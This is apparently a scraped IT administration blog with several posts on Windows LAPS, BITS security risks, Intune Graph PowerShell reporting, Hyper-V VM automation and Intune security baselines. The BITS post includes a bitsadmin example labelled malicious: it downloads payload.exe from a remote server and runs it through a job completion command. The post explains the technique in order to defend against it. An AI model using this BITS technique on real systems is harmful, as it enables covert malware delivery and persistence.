Value	Description
1	Reset password: upon expiry of the grace period, the managed account password will be reset.
3 (Default)	Reset the password and logoff the managed account: upon expiry of the grace period, the managed account password will be reset and any interactive logon sessions using the managed account will be terminated.
5	Reset the password and reboot: upon expiry of the grace period, the managed account password will be reset and the managed device will be immediately rebooted.
11	Reset the password, logoff the managed account, and terminate any remaining processes: upon expiration of the grace period, the managed account password is reset, any interactive logon sessions using the managed account are logged off, and any remaining processes are terminated.

Outcome

If you set up the new settings correctly, the passwords on your devices might look like this:

Complete with the new Passphrase and Account randomization.

Of course you can still, trigger a manual password rotation via the Device blade.

Security Risks of the BITS process | Security

Mon, 30 Dec 2024 23:03:35 GMT

BITS (Background Intelligent Transfer Service)

Introduction

The Background Intelligent Transfer Service, or BITS, is an incredibly useful tool for programmers and system administrators. It's amazing at downloading files from or uploading files to HTTP web servers and SMB file shares, and it considers the cost of the transfer and network usage so that your foreground work doesn't have to wait. BITS is also great at handling network interruptions, pausing and automatically resuming transfers, even after a reboot. It's got PowerShell cmdlets for creating and managing transfers, and the BitsAdmin command-line utility.

Use BITS for applications that need to:

Download from or upload files to an HTTP or REST web server or SMB file server.
Automatically resume file transfers after network disconnects and computer restarts.
Preserve the responsiveness of other network applications.
Be mindful of the network cost of the transfer.

Example applications:

Windows Update: The BITS service, is used to download and install Windows updates.
Microsoft Office: Microsoft Office applications, such as Word and Excel, use BITS to download and install updates and features.
Adobe Creative Cloud: Adobe Creative Cloud applications use BITS to download and install updates and new features.
Microsoft Store: The Microsoft Store uses BITS to download and install apps and updates.
Windows Defender: Windows Defender uses BITS to download and install updates and signature files.

Example Code:

powershell

Import-Module BitsTransfer
mkdir -force c:\temp\BITSFILES
Start-BitsTransfer -Source https://aka.ms/WinServ16/StndPDF -Destination c:\temp\BITSFILES\WindowsServer2016.pdf

Why is the BITS Service a potential security risk?

Potential exploitation: The BITS service can be exploited by malware to download and install malicious software without user interaction, adding additional metadata for retry attempts and post-completion commands.
Defense Evasion: Attackers can programmatically create BITS jobs to download malicious files or execute commands upon completion. Initial job creation is suspended until configured and can transfer files without user awareness.
Elevation: Creating BITS jobs does not require elevated privileges, allowing attackers to create jobs that can execute malicious code without administrative privileges.
Persistance before Windows 10: If a BITS job doesn't complete, it can be reactivated when the user logs in, repeatedly executing malicious payloads, demonstrating the potential for sustained attacks.
Persistance after Windows 10: If a remote server is configured not to respond, Windows keeps trying until the attacker decides to make it respond and deliver a payload.
Firewall Evasion: The BITS service is generally allowed access by most host-based firewalls.

DANGER

Deprecation of bitsadmin
The bitsadmin tool has been deprecated in Windows 7 and 2008 R2, it is superceeded by the new PowerShell BITS cmdlets.
But even so the bitsadmin.exe is still available in the Windows\System32\ folder.

Attack Mechanism

Attackers configure BITS jobs via the COM interface, PowerShell or the Bitsadmin tool. Jobs can download malicious files and execute commands after the transfer. Jobs remain active until explicitly completed, facilitating persistence. One notable technique is event-driven execution, where attackers can control payload delivery by manipulating server responses. The BITS service also has upload functionality that can be abused for exfiltration.

Example Code for malicious use of bitsadmin.exe:

batch

REM This command creates a new BITS job
bitsadmin /create myattackjob

REM This command adds a file to the BITS job. It specifies that the file 'payload.exe' should be downloaded from 'http://myserver/payload.exe' and saved to the '%TEMP%' directory on the local machine as 'payload.exe'.
bitsadmin /addfile myattackjob "http://myserver/payload.exe" "%TEMP%\payload.exe"

REM This command sets the notification flags for the BITS job. The flag 1 indicates that the job should notify the user when it is complete.
bitsadmin /setnotifyflags myattackjob 1

REM This command sets the notification command line for the BITS job. When the job is complete, it will execute 'cmd.exe' and then starts the downloaded 'payload.exe'.
bitsadmin /setnotifycmdline myattackjob "C:\windows\system32\cmd.exe" "/C bitsadmin /complete myattackjob & start %TEMP%\payload.exe"

REM This command resumes the BITS job, starting the download process.
bitsadmin /resume myattackjob

Detection and Monitoring

Detecting BITS abuse is difficult because completed jobs are logged in the Windows event log, but crucial information about the commands executed is often missing. Network monitoring can help identify suspicious BITS (SMB and HTTP) traffic.

Active jobs can be monitored using the Bitsadmin tool (bitsadmin /list), PowerShell (Get-BitsTransfer) or the Windows Event Log. Logs in the Windows Event Viewer (IDs 3, 59, 60 and 4) track jobs created and completed, but do not show details of command execution (Path: Event Viewer -> Applications and Services Logs -> Microsoft -> Windows -> BITS Client). Process monitoring using tools such as Sysmon can reveal BITS-related activity.

Defense Strategies

Disabling the BITS service is not recommended as it may interfere with system and software updates. It would be possible to block the BITS traffic at the perimeter of the network and allow updates to be delivered via an internal server. This can be difficult, however, as the Bits service operates over HTTP and HTTPS, and blocking these would hinder web browsing. In addition, in order to be able to inspect the HTTPS traffic, a TLS breakout would be required.

A simpler way to mitigate some risks is through Group policies.

JobInactivityTimeout: Limits the time a job can remain inactive before being terminated. (Default 90 days)
- Reducing this would limit the persistence a BITS job could have.
MaxJobsPerUser: Limits the number of BITS jobs a user can create. (Default 60 Jobs per user)
- Reducing this to zero per user would limit the number of users who can create BITS jobs, restricting this functionality to administrative and service accounts, greatly reducing risk without compromising most update functionality.

WARNING

This could still interfere with updates that your users do on their own, without any elevation.

Intune | Powershell

Sun, 15 Dec 2024 20:54:09 GMT

Micrososft Intune

Create a Intune Configuration Catalog Policy with json source

Why the external source?

Modularity makes the code more flexible and gives 3rd Partys the possibility to make changes without understanding programing language. In Addition, it is easier for you to apropriate the Code for another program.

TIP

To get the configuration you want in a file, you can just create the Configuration Policy in Intune and export it afterswards to .json. But keep in mind, that the .json format delivert by intune will not be ready to be read by powershell. You need to go through it and check that it has the right patterns shown below (':' instead of '=', ',' at the end of lines and " or ' around text.)

Code

powershell

# Connect to Microsoft Graph
Connect-MgGraph -Scopes 'DeviceManagementConfiguration.ReadWrite.All'

# Define the Graph URI
 $uri = 'https://graph.microsoft.com/beta/deviceManagement/configurationPolicies'
  
# Define the path to the directory containing your JSON files
$ScriptPath = ($MyInvocation.MyCommand).Path
$ScriptDirectory = Split-Path $ScriptPath -Parent
$jsonFilesDirectory = "$($ScriptDirectory)\[your subfolder]]"
 
# Get all JSON files in the directory
$jsonFiles = Get-ChildItem -Path $jsonFilesDirectory -Filter *.json
 
# Loop through each JSON file
foreach ($jsonFile in $jsonFiles) {
		# Read the content of the JSON file and convert it to a PowerShell object
		$Json = Get-Content -Path $jsonFile.FullName
		Invoke-MgGraphRequest -Method Post -Uri $uri -ContentType 'Application/Json' -Body $json
}

Json Example

json

{
    "description":  "This Policy mangages the update timings of the Microsoft Defender AntiVirus components. ",
    "name":  "Windows_Defender",
    "platforms":  "windows10",
    "technologies":  "mdm",
    "settings":  [
                     {
                         "@odata.type":  "#microsoft.graph.deviceManagementConfigurationSetting",
                         "settingInstance":  {
                                                 "@odata.type":  "#microsoft.graph.deviceManagementConfigurationChoiceSettingInstance",
                                                 "settingDefinitionId":  "device_vendor_msft_defender_configuration_engineupdateschannel",
                                                 "settingInstanceTemplateReference":  null,
                                                 "choiceSettingValue":  {
                                                                            "@odata.type":  "#microsoft.graph.deviceManagementConfigurationChoiceSettingValue",
                                                                            "settingValueTemplateReference":  null,
                                                                            "value":  "device_vendor_msft_defender_configuration_engineupdateschannel_0",
                                                                            "children@odata.type":  "#Collection(microsoft.graph.deviceManagementConfigurationSettingInstance)",
                                                                            "children":  [
                                                                                         ]
                                                                        }
                                             }
                     }
                 ]
}

Intune - App User install status report | Powershell

Sun, 15 Dec 2024 20:54:09 GMT

Intune - App User install status report

Introduction

Managing application installations is crucial for any organization. Microsoft Intune, combined with Microsoft Graph, offers powerful tools to monitor and report on app installations. However, Intune provides these reports per app, requiring you to click into each one individually. In this article, we'll show you how to extract the Intune App user install status data using Microsoft Graph and compile it into an Excel file for a complete overview. This approach will help you track deployments across your organization.

Creating the script

Getting the information

First we need the info about which folder to use from the user.

powershell

Param(
  [Parameter(Mandatory=$True,Position=1)]
  [string]$folder
)

Second we need to import the nessary modules.
And third connect to the Microsoft Graph.

powershell

Import-Module Microsoft.Graph.Beta.DeviceManagement.Actions
Connect-MgGraph -Scopes 'DeviceManagementConfiguration.Read.All, User.Read.All'

Next we download the installation information for each app.

TIP

The command 'Get-MgBetaDeviceManagementReportUserInstallStatusReport' is still in beta and has a few problems at the moment.
Thats why we need to download the data in chunks of 50.

powershell

# Get all apps to iterate through them
$apps = Get-MgDeviceAppManagementMobileApp | select displayname, id
foreach ($app in $apps) {
    # Output the first file which will have the first 50 entries, but also a total row count.
    $outfile = "$($folder)\$($app.DisplayName)_1.json"
    Get-MgBetaDeviceManagementReportUserInstallStatusReport -Filter "(ApplicationId eq '$($app.id)')" -outfile $outfile  -top 50
    $count = 50
    $iteration = 1
    # Read the content of the JSON file and convert it to a PowerShell object
    $Json = Get-Content -Path $outfile | ConvertFrom-Json
    # Get the same app again and again with a different starting point, until we have all the data.
    if ($json.totalrowcount -gt $count){
        Do {
            $iteration = $iteration + 1
            Get-MgBetaDeviceManagementReportUserInstallStatusReport -Filter "(ApplicationId eq '$($app.id)')" -outfile "$($folder)\$($app.DisplayName)_$($iteration).json" -skip $count -top 50
            $count = $count + 50
        } until ($count -gt $json.totalrowcount)
    }
}

Deleting superfluous files

INFO

The script puts out a lot of files for intune apps that you didnt nessaryly use.
I can`t say if this is expected behaviour or a sideproduct of the beta module.
But we need to clean them up first before we can procede.

This will delete the default Intune folder and the Office file that will be created, and otherwise it will cause problems later on.

powershell

Remove-Item -path "$($folder)\iAnnotate for Intune" -confirm:$false
Get-ChildItem -Path $folder -Filter "*]*" | remove-item -confirm:$false

At the moment, the script will also create some corrupt files without extensions, which need to be deleted.

powershell

$files = Get-ChildItem -Path $folder -Filter *.
foreach($file in $files){
  Remove-Item -path $file.fullname -confirm:$false
}

Then we need to delete the application files that are empty (no installations or uninstallations).

WARNING

The provided data is in JSON format, but has an odd schema. So we need to take it apart and make it readable for our script.

powershell

# Get all files in the folder ending with .json and iterate through them
$files = Get-ChildItem -Path $folder -Filter *.json
foreach($file in $files){
  # Read the content of the JSON file and convert it to a PowerShell object
  $jsondata = get-content -path $file.fullname | ConvertFrom-Json
  # Create an array of objects with properties matching the schema
  $data = foreach ($row in $jsonData.Values) {
  $obj = New-Object PSObject
      for ($i = 0; $i -lt $jsonData.Schema.Count; $i++) {
          $obj | Add-Member -MemberType NoteProperty -Name $jsonData.Schema[$i].Column -Value $row[$i]
      }
  $obj
  }
  # Delete the file if there is no user entry in the file
  if(!($data)){
  Remove-Item -path $file.fullname -confirm:$false
  }
}

Transforming the data

All that remains is to take the rest of the files and transform the data for human reading.

powershell

#creating the array for the .csv file
$csv = @()
# Get all files in the folder ending with .json and iterate through them
$files = Get-ChildItem -Path $folder -Filter *.json
foreach($file in $files){
    # Saves the app name (aka the file name) to a variable
    $app = $file.name
    $app = $app -replace "_1.json",""
    # Read the content of the JSON file and convert it to a PowerShell object
    $jsondata = get-content -path $file.fullname | ConvertFrom-Json
    # Create an array of objects with properties matching the schema
    $data = foreach ($row in $jsonData.Values) {
        $obj = New-Object PSObject
        for ($i = 0; $i -lt $jsonData.Schema.Count; $i++) {
            $obj | Add-Member -MemberType NoteProperty -Name $jsonData.Schema[$i].Column -Value $row[$i]
        }
        # Adds the name of the app to the object
        $obj | Add-Member -MemberType NoteProperty -Name "App" -Value $app
        $obj
        # Loop checks if user still exists in EntraID and is enabled
        if (get-mguser -filter "userprincipalname eq '$($obj.UserPrincipalName)' and accountEnabled eq true") {
        # Info is added tot the .csv array
            $csv += , $obj
        }
  }
}
# Exports the array to a CSV file
# array values provided by Intune: userprincipalname, UserId, ApplicationId, UserName, UserPrincipalName, InstalledCount, FailedCount, PendingInstallCount, NotApplicableCount, NotInstalledCount
$csv | Export-Csv -Path "$($folder)\report.csv" -NoTypeInformation -Delimiter ";" -Encoding unicode

And the result is a nice readable .csv file, that can be opened in Excel or further processed with other tools.

💾 You can download the complete script in my GitHub Repo. Download

Virtual Mashine Hyper-V automation | Powershell

Sun, 15 Dec 2024 20:54:09 GMT

Hyper-V Virtual Mashine automation

Need a virtual test machine and don`t want to do the work every time? In this post, I'll walk you through a script that will create the test VM for you in about two and a half minutes. You'll barely have to lift a finger.

Sounds good? Then lets do this!

Prerequisites

Windows 11 or Windows 10 (pro or enterprise)
Hyper-V installed
Windows 11 ISO (pro or enterprise), with at least the may 2024 updates
Elevated powershell access

Creating the script

The prep

First we get our prerequisites straight and download the Windows 11 ISO.
Second we need to enable the Hyper-V Windows Feature.

powershell

Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All

The Script

Now, to start with the script, we first need a few infos from the user.
- The Name you want for the VM.
- The Folder where the VM should be created.
- The name of the Windows 11 ISO without the .iso extension. The script will assume the ISO is in the same folder as the VM will be created.

powershell

Param(
  [Parameter(Mandatory=$True,Position=1)]
  [string]$VMName,
  [Parameter(Mandatory=$True,Position=2)]
  [string]$Folder,
  [Parameter(Mandatory=$True,Position=3)]
  [string]$WindowsISO
)

Next a few of our own parameters are added.

powershell

$vhdpath = "$($Folder)\$($VMName)\$($VMName).vhdx"
$vhdsize = 50GB
$iso = "$($Folder)\$($WindowsISO).iso"
$imagePath = "$($Folder)\$($VMName).wim"

Now the Windows 11 iso will be mounted and the install.wim image file will be extracted from it.
This image file contains all the windows install files we need.

powershell

# extract .wim file from windows .iso
$DiskImage = Mount-DiskImage -ImagePath $iso -StorageType ISO -PassThru

push-Location "$((Get-Volume -DiskImage $DiskImage).driveletter):"

# read files with the usual filesystem commands
Copy-Item ".\sources\install.wim" -Destination $Folder

#Pop-Location
Dismount-DiskImage -DevicePath $DiskImage.DevicePath

The next step is to create the Virtual Disk Image used for the VM.
For that we create a .vdhx file (don`t be mislead by the VHD in the cmdlet.), mount it and prepare it for the Windows installation. This means creating the .vhdx, initializing it and creating and formating the needed partitions.

powershell

# Create a new VHDX file
New-VHD -Path $vhdPath -SizeBytes $vhdsize -Dynamic

# Mount the VHDX file
Mount-VHD -Path $vhdPath

# Get the disk number of the mounted VHDX
$disk = Get-Disk | Where-Object IsOffline -eq $false | Sort-Object Number | Select-Object -Last 1

# Initialize the disk
Initialize-Disk -Number $disk.Number

# Creates the four needed Windows partitions and formats them to Microsofts best practice
$system_part = New-Partition -DiskNumber $disk.Number -size 100MB -AssignDriveLetter -GptType "{c12a7328-f81f-11d2-ba4b-00a0c93ec93b}"
Format-Volume -DriveLetter $system_part.DriveLetter -NewFileSystemLabel "System" -FileSystem Fat32 -Confirm:$false -Force

$ms_part = New-Partition -DiskNumber $disk.Number -size 16MB -AssignDriveLetter -GptType "{e3c9e316-0b5c-4db8-817d-f92df00215ae}"

$recovery_part = New-Partition -DiskNumber $disk.Number -size 500MB -AssignDriveLetter -GptType "{de94bba4-06d1-4d40-a16a-bfd50179d6ac}"
Format-Volume -DriveLetter $recovery_part.DriveLetter -NewFileSystemLabel "Recovery" -FileSystem NTFS -Confirm:$false -Force

$windows_part = New-Partition -DiskNumber $disk.Number -UseMaximumSize -AssignDriveLetter -GptType "{ebd0a0a2-b9e5-4433-87c0-68b6b72699c7}"
Format-Volume -DriveLetter $windows_part.DriveLetter -NewFileSystemLabel "Windows" -FileSystem NTFS -Confirm:$false -Force

Now that we got a mounted prepared disk, we can apply the Windows image to it.

powershell

dism /Apply-Image /ImageFile:"$($Folder)\install.wim" /Index:1 /ApplyDir:"$($windows_part.DriveLetter):\"

And following this, we need to copy the boot files to the System partition.
Because this is a batch process we need to start it via a process and that necessitated the short sleep afterwards.

powershell

Start-Process -NoNewWindow -FilePath "$($windows_part.DriveLetter):\Windows\System32\bcdboot" -ArgumentList "$($windows_part.DriveLetter):\Windows /s $($system_part.DriveLetter):"
start-sleep -seconds 10

Before we can create the VM next, we have bit of cleanup to do.
This means dismounting the still mounted .vhdx, so the vm can use it and remove the install.wim image, because we don`t need it anymore and it takes up about 5 GB to 6 GB.

powershell

dismount-vhd -path $vhdpath
remove-item -path "$($Folder)\install.wim" -force

Now the VM can finally be created and for that, we first need to provide a few parameters. For the Test mashine 8 GB of RAM is used, Generation 2 so vTPM and Autopilot can be used and the VM uses the Default Switch. If you need something different, you can just change the parameters.

powershell

$VM = @{
     Name = $VMName
     MemoryStartupBytes = 8589934592
     Generation = 2
     BootDevice = "VHD"
     Path = "$($Folder)\$($VMName)"
     SwitchName = (Get-VMSwitch).Name
     VHDPath = $vhdpath
     GuestStateIsolationType = "TrustedLaunch"
 }

New-VM @VM

Now we need to set the KeyProtector and Enable TPM on VM so Autopilot is possible.

powershell

Set-VMKeyProtector -VMName $VMName -NewLocalKeyProtector
Enable-VMTPM -VMName $VMName

And then start and connects to VM. And just like this you got a fresh Windows 11 VM that doesn`t need extra steps to generalized.

powershell

Start-VM -Name $VMName
vmconnect.exe localhost $vmname

The whole Script together

Just run it, and your good to go.

TIP

If you allready got Hyper-V activated or using the script multiple times, just remove the 'Installation Hyper-V Windows Feature' part.

powershell

# Installation Hyper-V Windows Feature
Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All

# Parameter Promt
Param(
  [Parameter(Mandatory=$True,Position=1)]
  [string]$VMName,
  [Parameter(Mandatory=$True,Position=2)]
  [string]$Folder,
  [Parameter(Mandatory=$True,Position=3)]
  [string]$WindowsISO
)

# Parameter
$vhdpath = "$($Folder)\$($VMName)\$($VMName).vhdx"
$vhdsize = 50GB
$iso = "$($Folder)\$($WindowsISO).iso"
$imagePath = "$($Folder)\$($VMName).wim"

# extract .wim file from windows .iso
$DiskImage = Mount-DiskImage -ImagePath $iso -StorageType ISO -PassThru

push-Location "$((Get-Volume -DiskImage $DiskImage).driveletter):"

# read files with the usual filesystem commands
Copy-Item ".\sources\install.wim" -Destination $Folder

#Pop-Location
Dismount-DiskImage -DevicePath $DiskImage.DevicePath

# Create a new VHDX file
New-VHD -Path $vhdPath -SizeBytes $vhdsize -Dynamic

# Mount the VHDX file
Mount-VHD -Path $vhdPath

# Get the disk number of the mounted VHDX
$disk = Get-Disk | Where-Object IsOffline -eq $false | Sort-Object Number | Select-Object -Last 1

# Initialize the disk
Initialize-Disk -Number $disk.Number

# Creates the four needed Windows partitions and formats them to Microsofts best practice
$system_part = New-Partition -DiskNumber $disk.Number -size 100MB -AssignDriveLetter -GptType "{c12a7328-f81f-11d2-ba4b-00a0c93ec93b}"
Format-Volume -DriveLetter $system_part.DriveLetter -NewFileSystemLabel "System" -FileSystem Fat32 -Confirm:$false -Force

$ms_part = New-Partition -DiskNumber $disk.Number -size 16MB -AssignDriveLetter -GptType "{e3c9e316-0b5c-4db8-817d-f92df00215ae}"

$recovery_part = New-Partition -DiskNumber $disk.Number -size 500MB -AssignDriveLetter -GptType "{de94bba4-06d1-4d40-a16a-bfd50179d6ac}"
Format-Volume -DriveLetter $recovery_part.DriveLetter -NewFileSystemLabel "Recovery" -FileSystem NTFS -Confirm:$false -Force

$windows_part = New-Partition -DiskNumber $disk.Number -UseMaximumSize -AssignDriveLetter -GptType "{ebd0a0a2-b9e5-4433-87c0-68b6b72699c7}"
Format-Volume -DriveLetter $windows_part.DriveLetter -NewFileSystemLabel "Windows" -FileSystem NTFS -Confirm:$false -Force

# apply Image to VM Disk
dism /Apply-Image /ImageFile:"$($Folder)\install.wim" /Index:1 /ApplyDir:"$($windows_part.DriveLetter):\"

# Copies the System Boot files to the System partition
Start-Process -NoNewWindow -FilePath "$($windows_part.DriveLetter):\Windows\System32\bcdboot" -ArgumentList "$($windows_part.DriveLetter):\Windows /s $($system_part.DriveLetter):"

# Ingages a small delay to ensure the boot files are copied to the system partition because of the external process thats started
start-sleep -seconds 10

# Dismounts the VHDX file
dismount-vhd -path $vhdpath

# Removes the copied Windows install.wim Image
remove-item -path "$($Folder)\install.wim" -force

# VM creation
$VM = @{
     Name = $VMName
     MemoryStartupBytes = 8589934592
     Generation = 2
     BootDevice = "VHD"
     Path = "$($Folder)\$($VMName)"
     SwitchName = (Get-VMSwitch).Name[0]
     VHDPath = $vhdpath
     GuestStateIsolationType = "TrustedLaunch"
 }

New-VM @VM

# Set KeyProtector and Enable TPM on VM so Autopilot is possible
Set-VMKeyProtector -VMName $VMName -NewLocalKeyProtector
Enable-VMTPM -VMName $VMName

# Start and connects to VM
Start-VM -Name $VMName
vmconnect.exe localhost $vmname

Quick Wins to improve your security posture | Intune

Sat, 12 Oct 2024 20:29:55 GMT

Quick Wins to improve your security posture with Intune

Improving your organisation's security posture can seem daunting, but with Microsoft Intune, you can make significant improvements with a few strategic configurations. Here are some quick wins to get you started.

INFO

You can refine the following policies to meet the specific needs of your organisation.
The policies shown are a baseline that can be achieved with minimal disruption to your organisation.

1. Set Up Compliance Policy

Creating and enforcing compliance policies is a fundamental step in securing your devices. Compliance policies define the rules and settings that a device must comply with to be considered secure. Here's how to set up a policy that checks that your devices meet these minimum requirements:

Windows 10 22H2
A Firewall enabled
An Antivirus enabled
An Antispyware enabled

Open the Microsoft Intune admin center.
Navigate to 'Devices' -> 'Manage devices' -> 'Compliance' -> 'Create policy'.
Select your platform, click 'Create' and enter a Name for your policy.
In the 'Compliance settings' tab, select the 'Device Properties' and 'System Security' settings shown in the screenshots below.

When this is done, leave the 'Actions for non-compliance' tab as it is.
Next, assign the policy to all devices and create the policy.

Then select the 'Compliance settings' tab and check the 'Require devices with no compliance policy assigned as' box.

2. Conditional Access Policies

Conditional access policies help you control access to your organisation's resources based on conditions you define. By implementing conditional access policies, you can block non-compliant devices and enforce more secure authentication methods. To set this up, we use the new templates provided by Microsoft to achieve a baseline level of security:

WARNING

The following policies, when switched to ON, have a potentially huge impact on the access your users have to your resources.
To take the first step and minimize the risk to your environment, start with the 'Require compliant or hybrid Azure AD joined device or multifactor authentication for all users' policy. This will ensure that, at a minimum, your compliance policy (created above) is enforced, the device is hybrid joined, or MFA is used.
In practice, this means that your users can only log in to your cloud applications (e.g. Teams, Outlook, etc.) when they are using one of the following:

at least Windows 10 22H2
have a Firewall enabled
have an AntiVirus solution enabled
and an Antispyware enabled

to be compliant

or they nead a Hybrid joined device
or use Multifactor authentication.

TIP

It is highly recommended that you start by using all of the conditional access policies listed under Secure foundation.
But don't do too much at once, and start with the policy outlined in the box above.

Open the Microsoft Intune admin center.
Navigate to 'Devices' -> 'Manage devices' -> 'Conditional access' -> 'Create new policy from templates'.

In the following wizard you will see the conditional access templates offered by Microsoft.
Select the one you want to implement and click 'Review + create'.

In the next screen, leave the 'Report only' setting as it is and click 'Create'.

Start with 'Report only', check the sign in logs in the following days and if everything looks good, set it to 'ON'.

3. Use Security Baselines

Security baselines are preconfigured sets of security settings that are recommended by Microsoft. If you want to learn more about these policy sets, click on the following link to go to my article about them Microsoft Intune Security baselines.

For our third quick win, we're focusing on the 'Security Baseline for Windows 10 and later'.

Again open the Microsoft Intune admin center.
This time navigate to 'Endpoint security' -> 'Overview' -> 'Security baselines' -> 'Security Baseline for Windows 10 and later'.

If you now click 'Create profile' -> 'Create', you can enter a name for the policy and click 'Next'.
Next you will see the settings tab where Microsoft has pre-configured a plethora of security settings. Next up is the Settings tab, where Microsoft has preconfigured a wide range of security settings. These settings can be used as they are, but should be tested first with a small group of users in your environment. You can do this by going to the 'Assignment' tab and selecting a group that you have created. You can then simply 'Review + Create' the policy.

WARNING

⚠️Possible diruptive Settings to keep an eye on are:

'Administrative Templates' -> 'MS Security Guide' -> 'Configure SMB v1 client driver' and 'Configure SMB v1 server'
This could be a problem if you are still using SMB v1 for any reason at all. But if you are, I strongly recommend that you think about replacing or updating whatever it is that needs SMB v1.
'Administrative Templates' -> 'Printers' -> 'Limits print driver installation to Administrators'
If you have enabled the installation of printer drivers for normal users via the registry, then this setting will prevent users from being able to install printer drivers in the future. Again, I strongly recommend that you do not allow this now, due to the associated security flaw (CVE-2021-34481).
'Administrative Templates' -> 'System -> Device Installation -> Device Installation Restrictions' -> 'Prevent installation of devices using drivers that match these device setup classes'
This is only a problem if you are using an 'IEEE 1394 device that supports the SBP2 protocol device class'.
'Administrative Templates' -> 'System' -> 'Power Management' -> 'Sleep Settings'
Enforcing the need for a password on wakeup could disrupt possible group PC scenarios (although you should definitely enable this setting).
'Windows Components' -> 'BitLocker Drive Encryption' -> 'Removable Data Drives'
This setting denies write access to all removable drives (USB sticks) that are not encrypted by BitLocker.
'Windows Components' -> 'Windows Remote Management (WinRM)' -> 'WinRM Client' / 'WinRM Service'
These settings disable basic authentication.
'Browser'
If you rely on the use of password managers in your browser, this will disable that feature (at least for Microsoft Edge).
'Defender'
If you have not previously used security software, these settings could interfere with the use of unsigned drivers or software.
'Device Lock'
These settings may force your users to change their passwords to meet the new requirements.
'Firewall'
If you have applications running on your devices that rely on specific open ports that you have not configured, instead working with the firewall disabled, these settings will enable the three firewall profiles and could disrupt the use of these applications.
'Local Policies Security Options'
These settings could interfere with the ability of standard users to perform elevated tasks, and could disrupt systems that are using legacy network protocols.
'User Rights'
These settings control local user permissions for your devices, and if you are working with local users (which you should not be doing), you could mess up this access.

4. Enable Defender for Endpoint

Microsoft Defender for Endpoint provides advanced threat protection and endpoint detection and response capabilities.
For the fourth quick win, you can enable and deploy the configuration of Microsoft Defender for Endpoint through Intune.

IMPORTANT

If you want to use Intune to configure Defender for Endpoint policies, you need to enable these options. Otherwise, even the Defender settings from the Security Baseline for Windows 10 and later will not work.

Enable the configuration of Defender policies through Intune

Open the Microsoft Intune admin center -> go to 'Endpoint security' -> 'Microsoft Defender for Endpoint'.

Set the 'Allow Microsoft Defender for Endpoint to enforce Endpoint Security Configurations' to 'On', to set up the connection between Microsoft Defender for Endpoint and Intune.

Now set the 'Connect Windows devices version 10.0.15063 and above to Microsoft Defender for Endpoint' to 'On', to let Intune control the settings for Windows devices.

INFO

On the same tab, you can enable control for a range of other operating systems.

Onboard Devices to Defender for Endpoint (Installation on the devices)

In the Microsoft Intune admin center -> go to 'Endpoint security' -> 'Endpoint detection and response'.

Select 'Create policy' -> Platform = 'Windows' -> Profile = 'Endpoint detection and response' -> 'Create'.
Enter your policy name and description and click 'Next'.
Now select the settings shown in the screenshot below and click 'Next'.
In the Assignment tab, select 'All devices' to make sure every device is onboarded. Then click 'Next' and 'Save'.

Configure Defender for Endpoint Policies

WARNING

In order to configure Defender for Endpoint policies, we need to change a few policies in the Baseline we created earlier, the 'Securirty Baseline for Windows 10 and later' profile.
This is because the Baseline also configures some Defender settings that may conflict with the more specific Defender policies we want to create from here.
For this you need to go back to where you created the Baseline and open it. Under the section 'Defender' you set all options to 'Not Configured' (example below).

In the Microsoft Intune admin center -> go to 'Endpoint security' -> 'Antivirus' and select 'Create policy'.
After selecting 'Windows' as your platform, you can choose which policy to create. Start by selecting 'Defender update controls'.

Now name and describe your policy and select the settings shown in the screenshot below.
Then click 'Next' till you arrive at the Assignment tab, select 'All devices', then click 'Next' and 'Save'.

We will now create a second policy by following the same steps as described above, but this time we will select 'Microsoft Defender AntiVirus'.
Here I have chosen a wide range of security settings to give you the maximum security with the minimum disruption to your users. Again, simply select the settings shown in the screenshots below, then go to the 'Assignment' tab, select 'All devices', then click 'Next' and 'Save'.

To create the third and final policy, follow the same steps as above, but now select 'Windows Security Experience'.
This setting is to enable 'Tamper Protection', but if you wish you can also customise the Defender UI that your users see.

Conclusion

NOTE

By implementing these quick wins in Intune, you can significantly improve your organisation's security posture and create a minimum threshold to secure your environment.
Each step builds a more secure environment, protecting your data and resources from potential threats.

Security baselines | Intune

Sun, 29 Sep 2024 19:55:23 GMT

Microsoft Intune Security baselines

What is a security baseline?

Security baselines in Microsoft Intune represent preconfigured sets of security configurations for Windows devices. Essentially, they provide a standardized foundation for securing endpoints by encapsulating recommended security settings.

These baselines are curated by Microsoft security experts, covering a broad spectrum of security domains, including network security, account policies, and more. They offer a solid starting point for organizations, allowing for rapid deployment of essential security controls.

Key advantages of utilizing security baselines include:

Efficiency: Streamlined configuration and deployment of multiple security settings.
Best Practices: Leverage Microsoft's security expertise and recommendations.
Customization: Adapt baselines to align with specific organizational security requirements.
Compliance: Facilitate adherence to industry standards and regulatory mandates.

It's important to note that while baselines provide a robust framework, they require careful evaluation and potential customization to fully meet an organization's unique security posture. By effectively leveraging security baselines, organizations can significantly enhance their overall security posture and mitigate risks.

What is the difference between using a security baseline and a custom policy?

Security Baselines

Security baselines represent pre-configured sets of security settings derived from Microsoft's security recommendations and industry best practices. They offer a standardized approach to enhancing device security and often align with regulatory compliance standards.

Advantages:
- Rapid deployment and implementation
- Established security foundation
- The chance of misconfiguration is lower
Limitations:
- Less flexibility for tailoring to unique organizational needs
- Do not support the full range of options

Custom Policies

Custom policies provide granular control over device configurations, allowing organizations to define specific settings based on their unique security requirements and risk tolerance. These policies can be tailored to various device types and user groups.

Advantages:
- High degree of customization
- Precise control over device settings
- Ideal for complex environments with specific security needs
Limitations:
- Require more time and expertise to create and manage
- Increased risk of misconfiguration if not carefully designed

When to Use Which

Security baselines are well-suited for organizations seeking a rapid, standardized approach to security enhancement, or those who are just starting out on there Intune journey.
Custom policies are optimal for organizations with complex security requirements, unique device configurations, or specific compliance mandates.

By understanding the strengths and limitations of both options, security administrators can effectively leverage Intune to achieve the desired level of complexity and control in their device management.

Delving Deeper into the Windows Security Baseline
(Security Baseline for Windows 10 and later) (Security Baseline for Windows 10 and later)"">

The Windows Security Baseline encompasses a broad spectrum of settings designed to bolster device security, protect data, and mitigate risks.

Key Components of the Windows Security Baseline

The baseline covers the following critical areas:

Network Security:
- Firewall configuration (inbound/outbound rules, domain profile, private profile, public profile)
- Network discovery and file sharing settings
Device Encryption:
- BitLocker drive encryption policies
- Removable storage encryption policies
User Accounts:
- Password policies
- Account lockout policies
- Privileged account management
Application Control:
- SmartScreen filter settings
- PUA Protection (potentially unwanted applications)
System Security:
- Secure boot configuration
- Device Guard and Credential Guard policies
- Windows Hello for Business

Delving deeper into the Microsoft Defender for Endpoint Baseline
